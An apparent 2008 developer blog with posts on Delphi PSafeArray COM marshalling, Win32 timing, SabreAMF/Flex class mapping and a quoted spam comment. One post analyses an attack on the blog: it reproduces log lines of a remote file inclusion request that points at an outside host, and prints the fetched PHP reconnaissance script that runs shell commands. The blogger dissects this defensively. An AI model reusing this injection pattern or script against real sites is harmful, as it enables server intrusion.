The mysteries of PSafeArray

I use Delphi 7 for all my Windows projects, nice simple clean, easy maintainable AND Pascal. However if you find yourself lost in COM and automation, all of a sudden strange variable types appear like varArray, OleVariants, U/L bounds and PSafeArray’s and it´s getting worse: their initialization/finalization do not use Object.Free, Dispose() and the like anymore! As far I can understand its all about marshalling; the process of converting variables to COM variables and back..

PSafeArray is defined in ActiveX.pas:

  PSafeArray = ^TSafeArray;
  {$EXTERNALSYM tagSAFEARRAY}
  tagSAFEARRAY = record
    cDims: Word;
    fFeatures: Word;
    cbElements: Longint;
    cLocks: Longint;
    pvData: Pointer;
    rgsabound: array[0..0] of TSafeArrayBound;
  end;
  TSafeArray = tagSAFEARRAY;
  {$EXTERNALSYM SAFEARRAY}
  SAFEARRAY = TSafeArray;

Instantiate and free PSafeArray directly:

var
  Bounds: array[0..0] of TSafeArrayBound;
  SafeArray: PSafeArray;
begin
  Bounds[0].lLbound   := 0;
  Bounds[0].cElements := 100;
  SafeArray := SafeArrayCreate(VT_I1, 1, Bounds);
  SafeArrayDestroy(SafeArray);
end;

Typecast and multidimensional example:

var
  Data: Variant;
  SafeArray: PSafeArray;
begin
  Data      := VarArrayCreate([0, 1, 0, 2], VT_VARIANT);
  Data[0,0] := 1;
  Data[0,1] := 'some text';
  Data[0,2] := Now();
  Data[1,0] := 2;
  Data[1,1] := 'more text';
  Data[1,2] := Now();
  SafeArray := PSafeArray(TVarData(Data).VArray);
end;

To sum it up I´ve created an example inwhich a good ole pascal array is converted into an varArray which in turn is converted to an PSafeArray and back again to plain pascal:

procedure SMA(InData: TArrayOfDouble; Period: Integer; var OutData: TArrayOfDouble);
var
  psaInMatrix, psaOutMatrix: PSafeArray;
  vaInMatrix: Variant;
  LBound, HBound : Integer;

  I: Integer;
  InDataLength: Integer;
  D: Double;
begin
  //create varArray
  InDataLength := Length(InData);
  vaInMatrix := VarArrayCreate([0, InDataLength-1], varDouble);

  //copy data into varArray
  for I := 0 to InDataLength-1 do
    vaInMatrix[I] := InData[I];

  //typecast magic
  psaInMatrix := PSafeArray(TVarData(vaInMatrix).VArray);

  //COM call with a PSafeArray as return value
  psaOutMatrix := COM.SimpleMovingAverage(psaInMatrix, Period);

  //enum PSafeArray
  SafeArrayGetLBound(psaOutMatrix, 1, LBound);
  SafeArrayGetUBound(psaOutMatrix, 1, HBound);

    //copy data
  SetLength(OutData, HBound+1);
  for I := LBound to HBound do
  begin
    SafeArrayGetElement(psaOutMatrix, I, D);
    OutData[I] := D;
  end;

  //cleanup varArray
  VarClear(vaInMatrix);

  //cleanup PSafeArray
  SafeArrayDestroy(psaOutMatrix);
end;

This function can be called in the following way:

type
  TArrayOfDouble = array of Double;
var
  InData, OutData: TArrayOfDouble;
begin
  SetLength(InData, 9);
  InData[0] := 2.48;
  InData[1] := 2.54;
  InData[2] := 2.56;
  InData[3] := 2.48;
  InData[4] := 2.54;
  InData[5] := 2.56;
  InData[6] := 2.48;
  InData[7] := 2.54;
  InData[8] := 2.56;

  SMA(InData, 3, OutData);
end;

Last but not least, to enumerate an varArray use something like this:

for I := VarArrayLowBound(vaInMatrix, 1) to VarArrayHighBound(vaInMatrix, 1) do
  Memo1.Lines.Add(FloatToStr( vaInMatrix[I] ));

FloatToStr is needed here because the varArray was created with varDouble.

Further readings:

July 20th, 2008 - Posted in delphi | | 1 Comments

Please moderate

This blog has now been up for a good three months and today I received the first spam message. I´ve heard about the concept of spamming through forms but never cared… until today:

[Thingies] Please moderate: "Working with SabreAMF and Flex 3 using class mapping"
Author : auto insurance (IP: 90.153.128.11 , 90.153.128.11)
E-mail : <a class="moz-txt-link-abbreviated" href="mailto:d90s_test902@hotmail.com">d90s_test902@hotmail.com</a>
URL    : <a class="moz-txt-link-freetext" href="http://urlser.com/?m6c0v#0">http://urlser.com/?m6c0v#0</a>
Whois  : <a class="moz-txt-link-freetext" href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=90.153.128.11">http://ws.arin.net/cgi-bin/whois.pl?queryinput=90.153.128.11</a>
Comment:
2ykl1df-kh7u3ft-tw6q3ff2-0 <a class="moz-txt-link-freetext" href="http://urlser.com/?qbKvI#1">http://urlser.com/?qbKvI#1</a>
<a href=<a class="moz-txt-link-rfc2396E" href="http://urlser.com/?DYEVZ#2">"http://urlser.com/?DYEVZ#2"</a> rel="nofollow">insurance quotes</a>
[url=<a class="moz-txt-link-freetext" href="http://urlser.com/?m6c0v#3">http://urlser.com/?m6c0v#3</a>]auto insurance[/url]
[url]<a class="moz-txt-link-freetext" href="http://urlser.com/?3kTmj#4">http://urlser.com/?3kTmj#4</a>[/url]
[<a class="moz-txt-link-freetext" href="http://black-jack-mo.lookera.net/#5">http://black-jack-mo.lookera.net#5</a> black jack]
"cheap auto insurance":<a class="moz-txt-link-freetext" href="http://urlser.com/?nm4rK#6">http://urlser.com/?nm4rK#6</a>
[LINK <a class="moz-txt-link-freetext" href="http://online-poker-mo.lookera.net/#7">http://online-poker-mo.lookera.net#7</a>]online poker[/LINK]
[img]<a class="moz-txt-link-freetext" href="http://victor.freewebhostingpro.com/1.php">http://victor.freewebhostingpro.com/1.php</a>[/img]

Here´s my dilemma: I could throw in a chapta in order to distinguish between a spamming bot and an enthausistic reader/poster but it greatly reduces the usability. For me personally it’s exactly this reason to decline in a response ’cause I don´t like to create an account for everything.

Furthermore I strongly believe in “security through obscurity”, so let´s see what can be done here.

tbc

July 19th, 2008 - Posted in wp anti spam | | 0 Comments

Timing in Win32

Original text by Ryan M. Geiss
Check out his other stuff too.. the guys has been busy ;)

Results of some quick research on timing in Win32
by Ryan Geiss - 16 August 2002 (...with updates since then)

You might be thinking to yourself: this is a pretty simple thing
to be posting; what's the big deal?  The deal is that somehow,
good timing code has eluded me for years.  Finally, frustrated,
I dug in and did some formal experiments on a few different computers,
testing the timing precision they could offer, using various win32
functions.  I was fairly surprised by the results!

I tested on three computers; here are their specs:

    Gemini:   933 mhz desktop, win2k
    Vaio:     333 mhz laptop,  win98
    HP:       733 mhz laptop,  win2k

Also, abbreviations to be used hereafter:

    ms: milliseconds, or 1/1,000 of a second
    us: microseconds, or 1/1,000,000 of a second

timeGetTime - what they don't tell you 

First, I tried to determine the precision of timeGetTime().
In order to do this, I simply ran a loop, constantly polling
timeGetTime() until the time changed, and then printing the
delta (between the prev. time and the new time).  I then looked
at the output, and for each computer, took the minimum of all
the delta's that occured.  (Usually, the minimum was very solid,
occuring about 90% of the time.)  The results:

              Resolution of timeGetTime()
    Gemini:   10 ms
    Vaio:     1 ms
    HP:       10 ms

For now, I am assuming that it was the OS kernel that made the
difference: win2k offers a max. precision of 10 ms for timeGetTime(),
while win98 is much better, at 1 ms.  I assume that WinXP would also
have a precision of 10 ms, and that Win95 would be ~1 ms, like Win98.
(If anyone tests this out, please let me know either way!)

(Note that using timeGetTime() unfortunately requires linking to
winmm.lib, which slightly increases your file size.  You could use
GetTickCount() instead, which doesn't require linking to winmm.lib,
but it tends to not have as good of a timer resolution... so I would
recommend sticking with timeGetTime().

Next, I tested Sleep().  A while back I noticed that when you call
Sleep(1), it doesn't really sleep for 1 ms; it usually sleeps for longer
than that.  I verified this by calling Sleep(1) ten times in a row,
and taking the difference in timeGetTime() readings from the beginning
to the end.  Whatever delta there was for these ten sleeps, I just divided
it by 10 to get the average duration of Sleep(1).  This turned out to be:

              Average duration of Sleep(1)
    Gemini:   10 ms  (10 calls to Sleep(1) took exactly 100 ms)
    Vaio:     ~4 ms  (10 calls to Sleep(1) took 35-45 ms)
    HP:       10 ms  (10 calls to Sleep(1) took exactly 100 ms)

Now, this was disturbing, because it meant that if you call Sleep(1)
and Sleep(9) on a win2k machine, there is no difference - it still
sleeps for 10 ms!  "So *this* is the reason all my timing code sucks,"
I sighed to myself.

Given that, I decided to give up on Sleep() and timeGetTime().  The
application I was working on required really good fps limiting, and
10ms Sleeps were not precise enough to do a good job.  So I looked
elsewhere.

UPDATE: Matthijs de Boer points out that the timeGetTime function
returns a DWORD value, which will wraps around to 0 every 2^32
milliseconds, which is about 49.71 days, so you should write your
code to be aware of this possibility.

timeBeginPeriod / timeEndPeriod

HOWEVER, I should not have given up so fast!  It turns out that there
is a win32 command, timeBeginPeriod(), which solves our problem:
it lowers the granularity of Sleep() to whatever parameter you give it.
So if you're on windows 2000 and you call timeBeginPeriod(1) and then
Sleep(1), it will truly sleep for just 1 millisecond, rather than the
default 10!

timeBeginPeriod() only affects the granularity of Sleep() for the application
that calls it, so don't worry about messing up the system with it.  Also,
be sure you call timeEndPeriod() when your program exits, with the same
parameter you fed into timeBeginPeriod() when your program started (presumably
1).  Both of these functions are in winmm.lib, so you'll have to link to it
if you want to lower your Sleep() granularity down to 1 ms.

How reliable is it?  I have yet to find a system for which timeBeginPeriod(1)
does not drop the granularity of Sleep(1) to 1 or, at most, 2 milliseconds.
If anyone out there does, please let me know
(e-mail: );
I'd like to hear about it, and I will post a warning here.

Note also that calling timeBeginPeriod() also affects the granularity of some
other timing calls, such as CreateWaitableTimer() and WaitForSingleObject();
however, some functions are still unaffected, such as _ftime().  (Special
thanks to Mark Epstein for pointing this out to me!)

some convenient test code

The following code will tell you:
    1. what the granularity, or minimum resolution, of calls to timeGetTime() are,
on your system.  In other words, if you sit in a tight loop and call timeGetTime(),
only noting when the value returned changes, what value do you get?  This
granularity tells you, more or less, what kind of potential error to expect in
the result when calling timeGetTime().
    2. it also tests how long your machine really sleeps when you call Sleep(1).
Often this is actually 2 or more milliseconds, so be careful!

NOTE that these tests are performed after calling timeBeginPeriod(1), so if
you forget to call timeBeginPeriod(1) in your own init code, you might not get
as good of granularity as you see from this test!

        #include        
        #include        “windows.h”

        int main(int argc, char **argv)
        {
            const int count = 64;

            timeBeginPeriod(1);

            printf(”1. testing granularity of timeGetTime()…\n”);
            int its = 0;
            long cur = 0, last = timeGetTime();
            while (its < count) {
                cur = timeGetTime();
                if (cur != last) {
                    printf("%ld ", cur-last);
                    last = cur;
                    its++;
                }
            }

            printf("\n\n2. testing granularity of Sleep(1)...\n  ");
            long first = timeGetTime();
            cur = first;
            last = first;
            for (int n=0; n 0);
        }

              Result of GetPentiumClockEstimateFromRegistry()
    Gemini:   975,175,680 Hz
    Vaio:     FAILED.
    HP:       573,571,072 Hz   <-- strange...

              Empirical tests: RDTSC delta after Sleep(1000)
    Gemini:   931,440,000 Hz
    Vaio:     331,500,000 Hz
    HP:        13,401,287 Hz

However, as you can see, this failed on Vaio (the win98 laptop).
Worse yet, however, is that on the HP, the value in the registry
does not match the MHz rating of the machine (733).  That would
be okay if the value was actually the rate at which the timer
ticked; but, after doing some empirical testing, it turns out that
the HP's timer frequency is really 13 MHz.  Trusting the
registry reading on the HP would be a big, big mistake!

So, one conclusion is: don't try to read the registry to get the
timer frequency; you're asking for trouble.  Instead, do it yourself.

Just call Sleep(1000) to allow 1 second (plus or minus ~1%) to pass,
calling GetPentiumTimeRaw() (below) at the beginning and end, and then
simply subtract the two unsigned __int64's, and voila, you now know
the frequency of the timer that feeds RDTSC on the current system.
(*watch out for timer wraps during that 1 second, though...)

Note that you could easily do this in the background, though, using
timeGetTime() instead of Sleep(), so there wouldn't be a 1-second pause
when your program starts.

        int GetPentiumTimeRaw(unsigned __int64 *ret)
        {
            // returns 0 on failure, 1 on success
            // warning: watch out for wraparound!

            // get high-precision time:
            __try
            {
                unsigned __int64 *dest = (unsigned __int64 *)ret;
                __asm
                {
                    _emit 0xf        // these two bytes form the 'rdtsc' asm instruction,
                    _emit 0x31       //  available on Pentium I and later.
                    mov esi, dest
                    mov [esi  ], eax    // lower 32 bits of tsc
                    mov [esi+4], edx    // upper 32 bits of tsc
                }
                return 1;
            }
            __except(EXCEPTION_EXECUTE_HANDLER)
            {
                return 0;
            }

            return 0;
        }

Once you figure out the frequency, using this 1-second test, you can now
translate readings from the cpu's timestamp counter directly into a real
'time' reading, in seconds:

        double GetPentiumTimeAsDouble(unsigned __int64 frequency)
        {
            // returns < 0 on failure; otherwise, returns current cpu time, in seconds.
            // warning: watch out for wraparound!

            if (frequency==0)
                return -1.0;

            // get high-precision time:
            __try
            {
                unsigned __int64 high_perf_time;
                unsigned __int64 *dest = &high_perf_time;
                __asm
                {
                    _emit 0xf        // these two bytes form the 'rdtsc' asm instruction,
                    _emit 0x31       //  available on Pentium I and later.
                    mov esi, dest
                    mov [esi  ], eax    // lower 32 bits of tsc
                    mov [esi+4], edx    // upper 32 bits of tsc
                }
                __int64 time_s     = (__int64)(high_perf_time / frequency);  // unsigned->sign conversion should be safe here
                __int64 time_fract = (__int64)(high_perf_time % frequency);  // unsigned->sign conversion should be safe here
                // note: here, we wrap the timer more frequently (once per week)
                // than it otherwise would (VERY RARELY - once every 585 years on
                // a 1 GHz), to alleviate floating-point precision errors that start
                // to occur when you get to very high counter values.
                double ret = (time_s % (60*60*24*7)) + (double)time_fract/(double)((__int64)frequency);
                return ret;
            }
            __except(EXCEPTION_EXECUTE_HANDLER)
            {
                return -1.0;
            }

            return -1.0;
        }

This works pretty well, works on ALL Pentium I and later processors, and offers
AMAZING precision.  However, it can be messy, especially working that 1-second
test in there with all your other code, so that it runs in the background.

UPDATE: Ross Bencina was kind enough to point out to me that rdtsc “is a per-cpu
operation, so on multiprocessor systems you have to be careful that multiple calls
to rdtsc are actually executing on the same cpu.”  (You can do that using the
SetThreadAffinityMask() function.)  Thanks Ross!

QueryPerformanceFrequency & QueryPerformanceCounter: Nice

There is one more item in our bag of tricks.  It is simple, elegant, and as far
as I can tell, extremely accurate and reliable.  It is a pair of win32 functions:
QueryPerformanceFrequency and QueryPerformanceCounter.

QueryPerformanceFrequency returns the amount that the counter will increment over
1 second; QueryPerformanceCounter returns a LARGE_INTEGER (a 64-bit *signed* integer)
that is the current value of the counter.  

Perhaps I am lucky, but it works flawlessly on my 3 machines.  The MSDN library
says that it should work on Windows 95 and later.  

Here are some results:

              Return value of QueryPerformanceFrequency
    Gemini:   3,579,545 Hz
    Vaio:     1,193,000 Hz
    HP:       3,579,545 Hz

              Maximum # of unique readings I could get in 1 second
    Gemini:   658,000  (-> 1.52 us resolution!)
    Vaio:     174,300  (-> 5.73 us resolution!)
    HP:       617,000  (-> 1.62 us resolution!)

I was pretty excited to see timing resolutions in the low-microsecond
range.  Note that for the latter test, I avoided printing any text
during the 1-second interval, as it would drastically affect the outcome.

Now, here is my question to you: do these two functions work for you?
What OS does the computer run, what is the MHz rating, and is it a laptop
or desktop?  What was the result of QueryPerformanceFrequency?
What was the max. # of unique readings you could get in 1 second?
Can you find any computers that it doesn’t work on?  Let me know (e-mail: ), and
I’ll collect & publish everyone’s results here.

So, until I find some computers that QueryPerformanceFrequency &
QueryPerformanceCounter don’t work on, I’m sticking with them.  If they fail,
I’ve got backup code that will kick in, which uses timeGetTime(); I didn’t
bother to use RDTSC because of the calibration issue, and I’m hopeful that
these two functions are highly reliable.  I suppose only feedback from
readers like you will tell… =)

UPDATE: a few people have written e-mail pointing me to this Microsoft Knowledge
Base article which outlines some cases in which the QueryPerformanceCounter
function can unexpectedly jump forward by a few seconds.

UPDATE: Matthijs de Boer points out that you can use the SetThreadAffinityMask()
function to make your thread stick to one core or the other, so that ‘rdtsc’ and
QueryPerformanceCounter() don’t have timing issues in dual core systems.

Accurate FPS Limiting / High-precision ‘Sleeps’

So now, when I need to do FPS limiting (limiting the framerate to some
maximum), I don’t just naively call Sleep() anymore.  Instead, I use
QueryPerformanceCounter in a loop that runs Sleep(0).  Sleep(0) simply
gives up your thread’s current timeslice to another waiting thread; it
doesn’t really sleep at all.  So, if you just keep calling Sleep(0)
in a loop until QueryPerformanceCounter() says you’ve hit the right time,
you’ll get ultra-accurate FPS readings.

There is one problem with this kind of fps limiting: it will use up
100% of the CPU.  Even though the computer WILL remain
quite responsive, because the app sucking up the idle time is being very
“nice”, this will still look very bad on the CPU meter (which will stay
at 100%) and, much worse, it will drain the battery quite quickly on
laptops.  

To get around this, I use a hybrid algorithm that uses Sleep() to do the
bulk of the waiting, and QueryPerformanceCounter() to do the finishing
touches, making it accurate to ~10 microseconds, but still wasting very
little processor.

My code for accurate FPS limiting looks something like this, and runs
at the end of each frame, immediately after the page flip:

        // note: BE SURE YOU CALL timeBeginPeriod(1) at program startup!!!
        // note: BE SURE YOU CALL timeEndPeriod(1) at program exit!!!
        // note: that will require linking to winmm.lib
        // note: never use static initializers (like this) with Winamp plug-ins!
        static LARGE_INTEGER m_prev_end_of_frame = 0;
        int max_fps = 60;

        LARGE_INTEGER t;
        QueryPerformanceCounter(&t);

        if (m_prev_end_of_frame.QuadPart != 0)
        {
            int ticks_to_wait = (int)m_high_perf_timer_freq.QuadPart / max_fps;
            int done = 0;
            do
            {
                QueryPerformanceCounter(&t);

                int ticks_passed = (int)((__int64)t.QuadPart - (__int64)m_prev_end_of_frame.QuadPart);
                int ticks_left = ticks_to_wait - ticks_passed;

                if (t.QuadPart < m_prev_end_of_frame.QuadPart)    // time wrap
                    done = 1;
                if (ticks_passed >= ticks_to_wait)
                    done = 1;

                if (!done)
                {
                    // if > 0.002s left, do Sleep(1), which will actually sleep some
                    //   steady amount, probably 1-2 ms,
                    //   and do so in a nice way (cpu meter drops; laptop battery spared).
                    // otherwise, do a few Sleep(0)’s, which just give up the timeslice,
                    //   but don’t really save cpu or battery, but do pass a tiny
                    //   amount of time.
                    if (ticks_left > (int)m_high_perf_timer_freq.QuadPart*2/1000)
                        Sleep(1);
                    else
                        for (int i=0; i<10; i++)
                            Sleep(0);  // causes thread to give up its timeslice
                }
            }
            while (!done);
        }

        m_prev_end_of_frame = t;

...which is trivial to convert this into a high-precision Sleep() function.

Conclusions & Summary 

Using regular old timeGetTime() to do timing is not reliable on many Windows-based
operating systems because the granularity of the system timer can be as high as 10-15
milliseconds, meaning that timeGetTime() is only accurate to 10-15 milliseconds.
[Note that the high granularities occur on NT-based operation systems like Windows NT,
2000, and XP.  Windows 95 and 98 tend to have much better granularity, around 1-5 ms.]

However, if you call timeBeginPeriod(1) at the beginning of your program (and
timeEndPeriod(1) at the end), timeGetTime() will usually become accurate to 1-2
milliseconds, and will provide you with extremely accurate timing information.

Sleep() behaves similarly; the length of time that Sleep() actually sleeps for
goes hand-in-hand with the granularity of timeGetTime(), so after calling
timeBeginPeriod(1) once, Sleep(1) will actually sleep for 1-2 milliseconds, Sleep(2)
for 2-3, and so on (instead of sleeping in increments as high as 10-15 ms).

For higher precision timing (sub-millisecond accuracy), you'll probably want to avoid
using the assembly mnemonic RDTSC because it is hard to calibrate; instead, use
QueryPerformanceFrequency and QueryPerformanceCounter, which are accurate to less
than 10 microseconds (0.00001 seconds).  

For simple timing, both timeGetTime and QueryPerformanceCounter work well, and
QueryPerformanceCounter is obviously more accurate.  However, if you need to do
any kind of "timed pauses" (such as those necessary for framerate limiting), you
need to be careful of sitting in a loop calling QueryPerformanceCounter, waiting
for it to reach a certain value; this will eat up 100% of your processor.  Instead,
consider a hybrid scheme, where you call Sleep(1) (don't forget timeBeginPeriod(1)
first!) whenever you need to pass more than 1 ms of time, and then only enter the
QueryPerformanceCounter 100%-busy loop to finish off the last < 1/1000th of a
second of the delay you need.  This will give you ultra-accurate delays (accurate
to 10 microseconds), with very minimal CPU usage.  See the code above.

Please Note: Several people have written me over the years, offering additions
or new developments since I first wrote this article, and I've added 'update'
comments here and there.  The general text of the article DOES NOT reflect the
'UPDATE' comments yet, so please keep that in mind, if you see any contradictions.

UPDATE: Matthijs de Boer points out that you should watch out for variable CPU speeds,
in general, when running on laptops or other power-conserving (perhaps even just
eco-friendly) devices.  (Thanks Matthijs!)

This document copyright (c)2002+ Ryan M. Geiss.

July 14th, 2008 - Posted in thingies | | 0 Comments

Airtight Interactive


Cube Wall from Felix Turner.

July 14th, 2008 - Posted in just cool stuff | | 0 Comments

Wordpress hack

One day I felt the need for visitors insight on this blog. In the immense list of available plugins I chose StatPress. Very nice and all kind of nice-too-knows popped up in the admin. Amongst three thingy entries too like:

July 10, 2008	02:06:36	218.38.18.31	_SERVER[SCRIPT_FILENAME]=http:...	Windows 2000

Mmm, probably a scriptannak with to much time on its hands. However this needs more investigation … in my logs I found the complete requests:

218.38.18.31 - - [10/Jul/2008:02:06:33 +0200] "GET /2008/07/multiple-unlimited-php-versions-on-an-single-debian-apache-server/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 9638 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:34 +0200] "GET /?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 54974 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:35 +0200] "GET /2008/07/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 18301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

Ok, statpress is accurate about that :) For those who don´t know: Windows 2000 actually is NT5.0, afterall its the successor of Windows NT(New Technology) 4.0, which is the successor of Windows for Workgroups 3.x etc. So Windows Server 2003 is basically NT5.2.. I wonder how Windows Server 2008 is called….

Anyways, an GET request from altervista.org/id.txt dumped in ?_SERVER[SCRIPT_FILENAME] … if I´am correct this should be parsed by an php server as $_SERVER[SCRIPT_FILENAME] generating a warning or notice complaining about an assumed constant SCRIPT_FILENAME which will be set as altervista.org/id.txt?.. and supposedly including and parsing this id.txt thingie?? That is if register globals is set…right??

Let´s get this file with lynx http://test12356.altervista.org/id.txt?

< ? php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }

        return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kungkang“;
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv(”SERVER_SOFTWARE”);
$php1 = phpversion();
$name1 = $_SERVER[’SERVER_NAME’];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “kungkang was here ..“;
echo “uname -a: $un“;
echo “os: $os“;
echo “uptime: $up“;
echo “id: $id1“;
echo “pwd: $pwd1“;
echo “php: $php1“;
echo “software: $sof1“;
echo “server-name: $name1“;
echo “server-ip: $ip1“;
echo “free: $free“;
echo “used: $used“;
echo “total: $all“;
exit;

Look’s like a real phpinfo() ;) doesnt look too harmfull but Wordpress and Joomla should both be targets.. It does look outdated aswell cause I couldn´t get this thing to work, even with gobals registered. The output it should have generated:

kungkang
304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21 uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis) kungkang was here ..
uname -a: Fedora blog.virtec.org 2.2.18-5-%86-bigmem #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686
os: Linux
uptime: 304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21
id: uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis)
pwd: /var/htdocs/www/publish_http/
php: 5.0.6-0.FC.3
software: Apache
server-name: blog.virtec.org
server-ip:
free: 346128.63 Gb
used: 16342.80 Gb
total: 234591.44 Gb

This guys seems to be from indonesia and has a nice tag on http://www.strenna online.com/. I can advise you to disable javascripting before visiting.. however you wont be able to view his animation.

More information: whois strenna online.com

There are a million ways to inject everything into anything… and it will always be that way. If you´re looking for some protection checkout:

http://www.modsecurity.org/
ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.

http://www.phpwact.org/security/attack/catalog?s=script%20filename%20injection
A Catalog of Security Attacks: Methods of attacking a web application from the attackers perspective and how to prevent each attack from the application developers perspective.

July 10th, 2008 - Posted in thingies | | 2 Comments

Working with SabreAMF and Flex 3 using class mapping

After reading a few good articals (see list bellow) about using SabreAMF 1.x with Flex 2/3 my questions still stayed unanswered. I´ve used AMFPHP and saw the possibilities of class mappings, it gives nice code clarity despite the cost of dual implementation or (de)serialization differences. Very usefull when building large/critical applications with different progammers and designers. BlazeDS seems interesting too but the only thing I know about Jafa is how to spell it…including Phyton.

You´ll find a mountain of information about comparisons regarding the pros and cons of different AMF implementations by PHP however without solutions. In my humble opinion AMFPHP is, for now, usefull for projects with emphasis on the frontend with limited backend support. I’am looking for large OO structures and freedome of code with a less intrusive amf/php framework so SabreAMF sounds promising…

Unfortunately I couldnt find any suitable tutorials nor examples even failed over to www.metacrawler.com Anyways the lets get down to it!

We need to take the following steps and afterwards we have an example:

    Setup the php classes
    Setup an interfacing class
    Setup the flex classes
    Setup an amf gateway

php classes
In this simple real life situation I want to map three classes to and from Flex: they are used to manage users [CUser] within a group [CGroup] with the users stored in their member [CCollection] property. Indeed multiple groups could be stored in an collection aswell, but I leave that as homework :)

CObjects.php

class CUser extends CObject {

    public $id;
    public $username;

    public function __construct() {
        $this->id        = 0;
        $this->username  = "[user]";
    }

}

class CGroup extends CObject {

    public $id;
    public $name;
    public $members;

    public function __construct() {
        $this->id       = 0;
        $this->name     = "[group]";
        $this->members  = new CCollection();
    }

}

class CCollection extends SabreAMF_ArrayCollection {
}

From a php point of view nothing special here, just basic classes with a simple constructor and a few public properties to play with later on. However notice the members collection (line 26) with is derived from SabreAMF_ArrayCollection (line 33) included with the sabreamf. There are a few classes in flex which do not really map well to php and viceversa. Notably the ArrayCollection is a well known class in flex used frequently, but they already did that for you!

interfacing class
To keep things simple and structures eg. a single point of entry for AMF communication an seperate interface class is created like this:

CObjects.php

class CAMF {

    .
    .

    public function SendUser(CUser $user) {
        $user->username .= " is back!";
        return $user;
    }

    .
    .

    public function SendMembers(CGroup $group) {
        $c=$group->members->count();
        $group->name .= " members: $c";
        return $group;
    }

}

Every single function in here can be called one-on-one from flex! Cool hè :) I wrote a small class which handles requests from flex: CAmf. During coding and debugging small itches ocured during tracing and refreshing.. probably a cache thingy. Normally an RemoteObject is configured via a xml file describing various settings among the gateway url eg. http://servert/gateway.php It would occure connecting to the old one after changing it to for example http://servert2/gateway2.php .. grrrrr

The CAmf class builds an RemoteObject runtime and handles default event handling, otherwise a tedious job ;) Furthermore it simplifies calls to our php gateway with the call function, which I´ll describe later:

classes/CAmf.as

public function call(serviceName: String = "", methodName: String = "", arguments = null): void {
    this.amf.source = serviceName;
    var at: AsyncToken = this.amf.getOperation( methodName ).send( arguments );
}

flex classes
I haven´t found a mechanisme yet to put all flex classes in a single file. I´am not sure if its possible ´cause I remember reading somewhere it´s only possible to publish a single class per file..

classes/CUser.as

package classes
{

    [RemoteClass(alias="classes.CUser")]
    [Bindable]
    public class CUser extends CObject
    {
        public var id:int;
        public var username:String;

        //constructor
        public function CUser()
        {
            id          = 0;
            username    = "[username]";
        }

    }

}
classes/CGroup.as

package classes
{
    import classes.CCollection;

    [RemoteClass(alias="classes.CGroup")]
    [Bindable]
    public class CGroup extends CObject
    {
        public var id:int;
        public var name:String;
        public var members: CCollection;

        //constructor
        public function CGroup()
        {
            id      = 0;
            name   	= "[name]";
            members	= new CCollection();
        }
    }

}
classes/CCollection.as

package classes
{
    import mx.collections.ArrayCollection;

    [RemoteClass(alias="classes.CCollection")]
    [Bindable]
    public class CCollection extends ArrayCollection
    {
        public function CCollection(source:Array = null)
        {
            super(source);
        }
    }

}

Again nothing special except for a little experiment whith CCollection: it is derived from ArrayCollection just to see if ‘type’ changes affect amf communication.

amf gateway
You can pretty much use the example service callbackserver.php which comes with sabreamf. We´re going to build a callback service, register our php and flex classes and expand the onInvokeService a little bit:

gateway.php

SabreAMF_ClassMapper::registerClass('classes.CCollection'   ,'CCollection');
SabreAMF_ClassMapper::registerClass('classes.CUser'         ,'CUser');
SabreAMF_ClassMapper::registerClass('classes.CGroup'        ,'CGroup');

$server = new SabreAMF_CallbackServer();
$server->onInvokeService = 'InvokeService';
$server->exec();

function InvokeService($serviceName, $methodName, $arguments) {
    if (class_exists($serviceName)) {
        $serviceObject = new $serviceName;
        if (method_exists($serviceObject, $methodName)) {
            return call_user_func_array(array($serviceObject,$methodName),$arguments);
        } else {
            throw new Exception("Method '{$methodName}' does not exist in class '{$serviceName}'", 1);
        }
    } elseif (function_exists($methodName)) {
        return call_user_func($methodName, $arguments);
    } else {
        throw new Exception("Nothing to do for\r {$serviceName}->{$methodName}(".implode('|',$arguments).")", 2);
    }

}

This is where the magic takes place! The registerClass (lines 3-5) takes two arguments (both from an php point of view):

    1. $remoteClass:
    To import/include an flex class you need to supply the fullname including directory name relative to the project sources: our flex classes are stored in the directory classes/*.as
    The line [RemoteClass(alias=”classes.CUser”)] says send this class to php identified by “classes.CUser”. Consequently it will be mapped to CUser.

    2. $localClass:
    The name of the php class you want it to be mapped to.

For the coding stylists among us: hè what can I say!? I´am a bit neurotic when if-statements come into play..where´s the else??? I need to know it all. And yes I like exceptions too ;)

Sending and receiving objects using class mappings
Lets say we want to create a new user in flex and give it to php:

var amf: CAmf = new CAmf( "http://192.168.1.1/gateway.php" );

var userA: CUser = new CUser();
    userA.username = "Pepe";

amf.call( "CAMF", "SendUser", user );

After creating an connection to the gateway, we create an user and send it to our interfacing class CAMF using function SendUser with parameter user. If all went well an alert should popup with the username changed.

Lets say we want to create a group, add some users in flex and give it to php:

